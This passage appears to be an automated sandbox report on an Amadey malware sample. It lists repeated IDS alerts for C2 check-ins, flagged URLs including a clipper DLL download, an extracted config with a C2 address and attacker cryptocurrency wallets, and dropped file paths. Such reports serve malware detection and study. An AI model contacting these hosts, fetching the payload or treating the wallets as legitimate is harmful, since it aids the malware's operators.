                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449909802027700 02/08/23-21:32:14.933906
                            SID:2027700
                            Source Port:49909
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449832802027700 02/08/23-21:31:51.751305
                            SID:2027700
                            Source Port:49832
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449743802027700 02/08/23-21:31:26.963197
                            SID:2027700
                            Source Port:49743
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449930802027700 02/08/23-21:32:20.796642
                            SID:2027700
                            Source Port:49930
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449838802027700 02/08/23-21:31:54.373776
                            SID:2027700
                            Source Port:49838
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449936802027700 02/08/23-21:32:22.307700
                            SID:2027700
                            Source Port:49936
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449927802027700 02/08/23-21:32:20.024415
                            SID:2027700
                            Source Port:49927
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449829802027700 02/08/23-21:31:51.027291
                            SID:2027700
                            Source Port:49829
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449945802027700 02/08/23-21:32:24.485227
                            SID:2027700
                            Source Port:49945
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449856802027700 02/08/23-21:32:00.132402
                            SID:2027700
                            Source Port:49856
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449749802027700 02/08/23-21:31:28.419020
                            SID:2027700
                            Source Port:49749
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449847802027700 02/08/23-21:31:57.967039
                            SID:2027700
                            Source Port:49847
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449758802027700 02/08/23-21:31:30.574106
                            SID:2027700
                            Source Port:49758
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449786802027700 02/08/23-21:31:40.457663
                            SID:2027700
                            Source Port:49786
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449767802027700 02/08/23-21:31:33.408799
                            SID:2027700
                            Source Port:49767
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449875802027700 02/08/23-21:32:04.746050
                            SID:2027700
                            Source Port:49875
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449780802027700 02/08/23-21:31:38.981621
                            SID:2027700
                            Source Port:49780
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449710802027700 02/08/23-21:31:11.651177
                            SID:2027700
                            Source Port:49710
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449860802027700 02/08/23-21:32:01.115035
                            SID:2027700
                            Source Port:49860
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449911802027700 02/08/23-21:32:16.121219
                            SID:2027700
                            Source Port:49911
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449813802027700 02/08/23-21:31:47.049281
                            SID:2027700
                            Source Port:49813
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449902802027700 02/08/23-21:32:11.276709
                            SID:2027700
                            Source Port:49902
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449771802027700 02/08/23-21:31:36.658549
                            SID:2027700
                            Source Port:49771
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449822802027700 02/08/23-21:31:49.295197
                            SID:2027700
                            Source Port:49822
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449733802027700 02/08/23-21:31:24.349655
                            SID:2027700
                            Source Port:49733
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449946802027700 02/08/23-21:32:24.773081
                            SID:2027700
                            Source Port:49946
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449857802027700 02/08/23-21:32:00.376328
                            SID:2027700
                            Source Port:49857
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449898802027700 02/08/23-21:32:10.281507
                            SID:2027700
                            Source Port:49898
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449768802027700 02/08/23-21:31:33.720032
                            SID:2027700
                            Source Port:49768
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449964802027700 02/08/23-21:32:29.755518
                            SID:2027700
                            Source Port:49964
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449739802027700 02/08/23-21:31:25.862579
                            SID:2027700
                            Source Port:49739
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449828802027700 02/08/23-21:31:50.782978
                            SID:2027700
                            Source Port:49828
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449917802027700 02/08/23-21:32:17.561486
                            SID:2027700
                            Source Port:49917
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449894802027700 02/08/23-21:32:09.316597
                            SID:2027700
                            Source Port:49894
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449918802027700 02/08/23-21:32:17.798708
                            SID:2027700
                            Source Port:49918
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449770802027700 02/08/23-21:31:35.698493
                            SID:2027700
                            Source Port:49770
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449787802027700 02/08/23-21:31:40.714503
                            SID:2027700
                            Source Port:49787
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449752802027700 02/08/23-21:31:29.152515
                            SID:2027700
                            Source Port:49752
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449841802027700 02/08/23-21:31:56.501984
                            SID:2027700
                            Source Port:49841
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449901802027700 02/08/23-21:32:11.021221
                            SID:2027700
                            Source Port:49901
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449968802027700 02/08/23-21:32:30.770420
                            SID:2027700
                            Source Port:49968
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449806802027700 02/08/23-21:31:45.331321
                            SID:2027700
                            Source Port:49806
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449812802027700 02/08/23-21:31:46.808504
                            SID:2027700
                            Source Port:49812
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449714802027700 02/08/23-21:31:13.211259
                            SID:2027700
                            Source Port:49714
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449803802027700 02/08/23-21:31:44.620668
                            SID:2027700
                            Source Port:49803
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected


                            AV Detection

                            Source: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll, URL Reputation: Label: malware
                            Source: 62.204.41.4/Gol478Ns/index.php, URL Reputation: Label: malware
                            Source: http://62.204.41.4/Gol478Ns/index.php, URL Reputation: Label: malware
                            Source: file.exe, ReversingLabs: Detection: 66%
                            Source: file.exe, Joe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe, Joe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe, Joe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Joe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Joe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe, Joe Sandbox ML: detected
                            Source: 0.3.file.exe.4bb4820.0.raw.unpack, Malware Configuration Extractor: Amadey {"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
                            Source: 28.2.rundll32.exe.6f690000.0.unpack, Malware Configuration Extractor: Amadey {"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}
                            Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_011D2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_011D2F1D
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe, Code function: 1_2_00F82F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_00F82F1D

                            Compliance

                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe, Unpacked PE file: 2.2.amMl.exe.400000.0.unpack
                            Source: file.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe, File opened: C:\Windows\SysWOW64\msvcr100.dll
                            Source: file.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Source: Binary string: AC:\jir\banilukulivuj\lagite48_xag84\kukafed\varawayaseyu\36-h.pdb source: bmMg.exe, 00000001.00000003.262109812.0000000004742000.00000004.00000020.00020000.00000000.sdmp, amMl.exe, 00000002.00000000.262316550.0000000000401000.00000020.00000001.01000000.00000005.sdmp, amMl.exe.1.dr
                            Source: Binary string: wextract.pdb source: file.exe, bmMg.exe.0.dr
                            Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.261534340.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.261384983.0000000004B55000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp, xriv.exe, 0000000F.00000000.400800832.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp, xriv.exe, 0000000F.00000003.401064354.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp, mnolyk.exe, 00000010.00000002.785330986.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000010.00000000.402691693.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001B.00000000.409509080.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001B.00000002.410333613.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001F.00000000.518871560.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001F.00000002.519216462.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000023.00000000.645436147.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000023.00000002.646132951.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000024.00000000.774022466.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000024.00000002.774254315.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe.15.dr, xriv.exe.0.dr
                            Source: Binary string: Healer.pdb source: amMl.exe, 00000002.00000002.367490404.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, amMl.exe, 00000002.00000002.367466670.00000000025B0000.00000004.08000000.00040000.00000000.sdmp, amMl.exe, 00000002.00000002.367279348.00000000020F0000.00000004.00000020.00020000.00000000.sdmp, amMl.exe, 00000002.00000002.367376734.0000000002350000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: wextract.pdbGCTL source: file.exe, bmMg.exe.0.dr
                            Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: bmMg.exe, 00000001.00000003.262236025.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, bmMg.exe, 00000001.00000003.262206496.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, bmMg.exe, 00000001.00000003.262109812.000000000479D000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 0000000E.00000000.368083215.0000000000A02000.00000002.00000001.01000000.00000009.sdmp, nika.exe.1.dr
                            Source: Binary string: _.pdb source: amMl.exe, 00000002.00000002.367490404.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, amMl.exe, 00000002.00000002.367279348.00000000020F0000.00000004.00000020.00020000.00000000.sdmp, amMl.exe, 00000002.00000002.367376734.0000000002350000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\jir\banilukulivuj\lagite48_xag84\kukafed\varawayaseyu\36-h.pdb source: bmMg.exe, 00000001.00000003.262109812.0000000004742000.00000004.00000020.00020000.00000000.sdmp, amMl.exe, 00000002.00000000.262316550.0000000000401000.00000020.00000001.01000000.00000005.sdmp, amMl.exe.1.dr
                            Source: Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: mnolyk.exe, 00000010.00000002.785793369.000000000117F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001C.00000002.785642751.000000006F69F000.00000002.00000001.01000000.0000000D.sdmp, clip64.dll.16.dr, clip64[1].dll.16.dr
                            Source: Binary string: Healer.pdbH5 source: amMl.exe, 00000002.00000002.367490404.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, amMl.exe, 00000002.00000002.367466670.00000000025B0000.00000004.08000000.00040000.00000000.sdmp, amMl.exe, 00000002.00000002.367279348.00000000020F0000.00000004.00000020.00020000.00000000.sdmp, amMl.exe, 00000002.00000002.367376734.0000000002350000.00000004.08000000.00040000.00000000.sdmp
                            Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_011D2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_011D2390
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe, Code function: 1_2_00F82390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00F82390
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Code function: 15_2_011EFC58 FindFirstFileExW,15_2_011EFC58

                            Networking

                            Source: Traffic, Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49701 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49703 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49704 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49705 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49706 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49707 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49708 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49709 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49710 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49711 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49712 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49713 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49714 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49715 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49716 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49717 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49718 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49719 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49720 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49721 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49722 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49724 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49725 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49726 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49727 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49728 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49729 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49730 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49731 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49732 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49733 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49734 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49735 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49736 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49737 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49738 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49739 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49740 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49741 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49742 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49743 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49744 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49745 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49746 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49747 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49748 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49749 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49750 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49751 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49752 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49753 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49754 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49755 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49756 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49757 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49758 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49759 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49760 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49761 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49762 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49763 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49764 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49765 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49766 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49767 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49768 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49769 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49770 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49771 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49772 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49773 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49774 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49775 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49776 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49777 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49778 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49779 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49780 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49781 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49782 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49783 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49784 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49785 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49786 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49787 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49788 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49789 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49790 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49791 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49792 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49793 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49794 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49795 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49796 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49797 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49798 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49799 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49800 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49801 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49802 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49803 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49804 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49805 -> 62.204.41.4:80
